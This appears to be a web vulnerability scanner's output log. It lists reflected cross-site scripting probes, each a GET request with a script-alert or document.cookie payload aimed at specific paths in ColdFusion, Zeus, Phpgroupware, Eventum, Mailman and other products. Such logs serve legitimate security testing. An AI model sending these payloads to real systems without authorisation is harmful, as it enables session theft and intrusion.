+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</script> : With malformed URLS, Coldfusion is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> : Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> : 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the querystring. This may be a Null HTTPd server.
+ OSVDB-0: GET /a.jsp/<script>alert('Vulnerable')</script> : JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.thtml : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.shtml : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.jsp : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /%0a%0a<script>alert(\"Vulnerable\")</script>.jsp : Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6662: GET /<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9239: GET /mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>; : Mailmain is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25497: GET /index.php?rep=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-14633: GET /ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> : Sun Answerbook is vulnerable to XSS in the search field.
+ OSVDB-19947: GET /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> : Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12606: GET /index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2562: GET /login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2790: GET /index.php?vo=\"><script>alert(document.cookie);</script> : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
